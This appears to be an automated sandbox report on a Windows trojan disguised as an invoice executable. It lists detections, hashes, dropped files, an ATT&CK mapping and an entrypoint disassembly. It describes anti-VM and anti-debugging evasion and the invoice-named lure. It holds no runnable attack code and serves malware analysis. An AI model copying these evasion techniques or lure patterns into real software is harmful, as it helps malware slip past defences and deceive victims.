Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_00406448 FindFirstFileA,FindClose,	0_2_00406448
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040589C
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000005.00000002.685487977.0000000004D00000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000005.00000002.685752998.00000000052D0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_10003111 LdrInitializeThunk,

0_2_10003111

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

Code function: 0_2_72AB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_72AB1A98

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_1000410A mov eax, dword ptr fs:[00000030h]		0_2_1000410A
Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe	Code function: 0_2_10003F0F mov eax, dword ptr fs:[00000030h]		0_2_10003F0F

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe

0_2_00403325

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Access Token Manipulation1	Virtualization/Sandbox Evasion2	OS Credential Dumping	Security Software Discovery121	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection1	Access Token Manipulation1	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Information Discovery3	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Invoice 6500TH21Y5674.exe	53%	ReversingLabs	Win32.Trojan.Wacatac
Invoice 6500TH21Y5674.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll	33%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll	29%	ReversingLabs	Win32.Trojan.Convagent
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	Invoice 6500TH21Y5674.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Invoice 6500TH21Y5674.exe	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356249
Start date:	22.02.2021
Start time:	20:18:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Invoice 6500TH21Y5674.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.winEXE@2/7@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 70% (good quality ratio 69%) Quality average: 88.2% Quality standard deviation: 21.2%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.57.81.29, 168.61.161.212, 204.79.197.200, 13.107.21.200, 13.88.21.125, 23.54.113.53, 104.43.193.48, 13.64.90.137, 52.255.188.83, 51.104.139.180, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 51.11.168.160 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll	Invoice 6500TH21Y5674.exe	Get hash	malicious	Browse
	GPP.exe	Get hash	malicious	Browse
	OrderSuppliesQuote0817916.exe	Get hash	malicious	Browse
	ACCOUNT DETAILS.exe	Get hash	malicious	Browse
	Quotation.com.exe	Get hash	malicious	Browse
	Unterlagen PDF.exe	Get hash	malicious	Browse
	QuotationInvoices.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe	Get hash	malicious	Browse
	SecuriteInfo.com.FileRepMalware.24882.exe	Get hash	malicious	Browse
	PDF_doc.exe	Get hash	malicious	Browse
	09000000000000.jar	Get hash	malicious	Browse
	quotation10204168.dox.xlsx	Get hash	malicious	Browse
	notice of arrivalpdf.exe	Get hash	malicious	Browse
	R5BNZ68i0f.exe	Get hash	malicious	Browse
	payment.exe	Get hash	malicious	Browse
	notice of arrival.xlsx	Get hash	malicious	Browse
	Invoice Overdue.exe	Get hash	malicious	Browse
	Invoice Overdue.exe	Get hash	malicious	Browse
	CHEQUE COPY RECEIPT.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Invoice 6500TH21_a95a9cdbd3868a56584b72cabf593f6f9eaa3187_00d3adf0_1b973ea4\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	13168
Entropy (8bit):	3.773890261765939
Encrypted:	false
SSDEEP:	192:NvLU34rLFHBUZMXaYuj7exSA/u7sqS274Itcmeo:lLU34rL1BUZMXaYujI/u7sqX4Itcmeo
MD5:	B9A8105BDE3A01D5F56C856A101230A3
SHA1:	C6733AFEDB1EC9356EFA1AFE2965F6E45308A8F8
SHA-256:	761739947FF5886D6E70676DB774D40C1B7CCAEA3D9E9612DA10F34FD9EB9896
SHA-512:	88675EC0371A6C8A4A6E77543A26363A3D3A6AC5467165677CB24942CC77BF185C2647B060BADA747B64325E67047B6EE337C7B2651270F327153612D658BD69
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.4.9.5.1.7.7.5.0.3.3.4.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.4.9.5.1.8.2.8.0.0.1.9.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.5.8.9.2.2.c.-.3.1.9.7.-.4.d.8.3.-.9.8.2.2.-.b.6.c.c.f.9.7.9.3.f.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.f.9.f.6.d.4.-.7.3.4.6.-.4.5.d.c.-.8.b.f.a.-.0.d.2.7.a.1.c.7.e.7.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.n.v.o.i.c.e. .6.5.0.0.T.H.2.1.Y.5.6.7.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.1.0.-.0.0.0.1.-.0.0.1.b.-.c.1.8.7.-.1.4.a.6.4.f.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.7.b.7.9.2.2.d.7.e.0.b.6.4.7.f.5.2.4.4.9.5.7.e.4.8.1.5.b.1.5.e.0.0.0.0.0.9.0.4.!.0.0.0.0.6.5.d.3.e.4.f.4.d.f.3.4.b.b.2.5.f.7.b.6.2.1.d.d.0.4.5.7.c.6.4.1.f.9.8.0.2.9.c.b.!.I.n.v.o.i.c.e. .6.5.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER231D.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Feb 22 19:19:39 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	66162
Entropy (8bit):	2.1563332439998835
Encrypted:	false
SSDEEP:	384:qlI2YeD8dE4EQAxxA3H10ljr7LnF8Gh7E:ohD8e4ExxA3H10ljr7LnDBE
MD5:	3E18A873E93E36A60B274EF695D5F2E9
SHA1:	9071A4147E55E48BCE1E35DBA3492581FADABBCB
SHA-256:	6F82FD3AF651C2393C97F88543EEBC77AAA4B0C65E1366EF15CFE1E1F76C6743
SHA-512:	79FD6DB6FD28373012CA805A4BAD5FC4EDB1A6CD77C04A5A529EC7F60E0BE51AEB54B202B3A106DD668A6D115908270A311D748A3871CD0B0B6B3F0364A841DD
Malicious:	false
Reputation:	low
Preview:	MDMP....... .........4`...................U...........B.......!......GenuineIntelW...........T.............4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AEE.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8344
Entropy (8bit):	3.7019413029395705
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi6Fs6IRe6YrsSUbsigmfMuSf+pr289bjfsfZAhm:RrlsNi6O6IRe6YQSUbsigmfMuSkjEfZ7
MD5:	A891BE51303A267ACB51A284CB6F3668
SHA1:	AF4710514288DFAA07818E6E173116968323ECD5
SHA-256:	41502FDF20090687C574C502CEDB65E0F6C2351ACEEABA305F41212E09C64B39
SHA-512:	F5D8429D0CDE5638E97D6BEBC7E7D944BBAC593270601C64ABF5B108A6920B02AA7290C136FAB99575EE5C79A3FF314AAC2E945D75B1D41C8E7115055B8C3454
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.2.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CA5.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4623
Entropy (8bit):	4.4833358782904815
Encrypted:	false
SSDEEP:	48:cvIwSD8zs/JgtWI9/HWSC8BQ/8fm8M4JslB7qNuGFxt+q8Pn7623fS2OXivei0d:uITfh82SNjJk7dyte71PS2OSvJ0d
MD5:	5FFC0A71BC19D54284F6747E18C59EB3
SHA1:	F4A411FD3EB3DA53EC9B4E208635E2F3976646CE
SHA-256:	BD8919A5D39364FA78A4D8F9CFBD8549731DA6553F772527BECB2D48392E8EB7
SHA-512:	EDC6FFB38BB75D117388F7E32A82259E43B249FC378D11299FB464DB976BC5B50B59B8685680B43B269C6B4971E2BFCB2C2338CA10C657D9CF79E5D73606C816
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="872910" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Temp\csnalztt.zl Download File
Process:	C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
File Type:	data
Category:	dropped
Size (bytes):	164864
Entropy (8bit):	7.998912168321662
Encrypted:	true
SSDEEP:	3072:vjvBirrhYZ6EhU+VR/zSRz3DInq5u+bFGLESasrlOqs621Ov4hrjlg:vjvBA+ESZBzSRz3DwNAHsr47x1Ov4h6
MD5:	56F7AC02D44E2C397DD1290AA89650A8
SHA1:	790FD108F1870FA972269CB1F8B2DEB71EB7CACA
SHA-256:	6A2E176536A074D8B73F52CA163CD414685662FF9372E964D075DA84E3F9A3EC
SHA-512:	5904B945CF35CB93CE6CE28608CC7A1689696DFD0AA217B153EBF3057C84B0F6B70B4AD4DBAC106D161C77B7E7B8A96B79175EBEFF2D1CB7AC119E92D0C02161
Malicious:	false
Reputation:	low
Preview:	fY........i!3.J....H?T.)u...W..l-^Z.....>.........y>.E.vh.\|..YU..[iJ...@.'.'........ba.u.0.1:.B)...^.3.5...N@....o m@.....F.L."..&IB-.HnG<a.^...Xd..%.+.Z..E.X.s....[.?....j......Dc.Y..l..........P.....EI.6.bf.$..<c.xkCC....,...l..'.bHm..H.D.1..q'....[..).7.K.A..........d.`.y.`.&.!.<S..2T..$v.Cp..Z.dk...Wo.....{.-V.......A.......;...p......o.OG..92.{U.A.tf..&^.4.....#.3w.5.p.,.f..v4.h.....%.oJ... t..."..BU..b.@!.d.Jw...].8o.,.<.{..B...I.\+C.A:I......A.z<JVL....X...6..V.rj+n...fUYF....I-.7..`......r..i...I.O..Iz?.U....0..Sa..;nr..V...8G........Yi0L...T..s.....L.O...tM9P.......Bm..j.."../=._0...+.\..P......p.tt Y.S.w%Y.._i.X..+>Y&...y..(.k...k.._....i...\|./`.w..;..`~.,........l?........L.3.x.s.."....V..^L.....:>..A..)..."R..?..7...".kg$..o.t..{...G..(..R .....!.F.2..G...h...`..Z..gg.+..b3H..m...zz.OS....NP.8...;.;....m.fP..2.....~M...-..eP... 3R2d;[.T...U...N;(.........Q.y5t..n...M.`.?.....Z..2j.z..rQ*._..F.x....S.R.;........f.#:#....DT

C:\Users\user\AppData\Local\Temp\ir9ehshgyir.dll Download File
Process:	C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	6.36613341806139
Encrypted:	false
SSDEEP:	96:WkB+SnWJ9nZE0vhI2B3cubTsVoeMzr+o1s0klKGIvxzj13IDmZU7ukhMAzN+2:W4T0vhtlbDklKGM13y37ukhp+
MD5:	27352D6A2DA80C7A04C0A589E7F025BD
SHA1:	500B490B02EE59DEEE00FEB4C59A9F0308464E5C
SHA-256:	427AB077A32D2844F5E82A1D0C52B9FA73BB58298DC70B3D3A55BA05552DD840
SHA-512:	5AFC122644CA2D1B2F9594ADF653BE281001C6C4E4D6D31B55950B83C64A1434B63054594B575510A9FA707D33E22624F01E92F5DA2572712E364C7E1C21108B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 33%, Browse Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./e..k.y.k.y.k.y..fx.`.y.k.x.y.y..Zq.j.y..Zy.j.y..Z{.j.y.Richk.y.................PE..L....`.`...........!......................... ...............................P......................................` ..L.... ..x.................................................................................... ..`............................text............................... ..`.rdata....... ......................@..@.data........0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll Download File
Process:	C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse Filename: GPP.exe, Detection: malicious, Browse Filename: OrderSuppliesQuote0817916.exe, Detection: malicious, Browse Filename: ACCOUNT DETAILS.exe, Detection: malicious, Browse Filename: Quotation.com.exe, Detection: malicious, Browse Filename: Unterlagen PDF.exe, Detection: malicious, Browse Filename: QuotationInvoices.exe, Detection: malicious, Browse Filename: PO.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.24882.exe, Detection: malicious, Browse Filename: PDF_doc.exe, Detection: malicious, Browse Filename: 09000000000000.jar, Detection: malicious, Browse Filename: quotation10204168.dox.xlsx, Detection: malicious, Browse Filename: notice of arrivalpdf.exe, Detection: malicious, Browse Filename: R5BNZ68i0f.exe, Detection: malicious, Browse Filename: payment.exe, Detection: malicious, Browse Filename: notice of arrival.xlsx, Detection: malicious, Browse Filename: Invoice Overdue.exe, Detection: malicious, Browse Filename: Invoice Overdue.exe, Detection: malicious, Browse Filename: CHEQUE COPY RECEIPT.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.888760018796244
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Invoice 6500TH21Y5674.exe
File size:	215032
MD5:	dc22d7783144cfe4dcbb4734ed6a3656
SHA1:	65d3e4f4df34bb25f7b621dd0457c641f98029cb
SHA256:	c9fc9a54366452a99c7ed753c7f5055141bc579b1a2530f8db7d7a039db6225d
SHA512:	908395a21d0a9411d8d2839b7c952f1cf50fd1998c5325457913cc27b581719d890919c196460ce5eb9fadba874b40043a537e8e40ff6aac75fd0dffcae7be4c
SSDEEP:	6144:7x/MzpANjvBA+ESZBzSRz3DwNAHsr47x1Ov4h9:RcpKjTyR7Dw347xkv4h9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L...%.$_.................d....9.....%3............@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x403325
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D625 [Sat Aug 1 02:40:37 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A2F6Ch], eax
je 00007EFDA4D202B3h
push ebx
call 00007EFDA4D23416h
cmp eax, ebx
je 00007EFDA4D202A9h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007EFDA4D23392h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007EFDA4D2028Dh
push 0000000Bh
call 00007EFDA4D233EAh
push 00000009h
call 00007EFDA4D233E3h
push 00000007h
mov dword ptr [007A2F64h], eax
call 00007EFDA4D233D7h
cmp eax, ebx
je 00007EFDA4D202B1h
push 0000001Eh
call eax
test eax, eax
je 00007EFDA4D202A9h
or byte ptr [007A2F6Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [007A3038h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079E528h
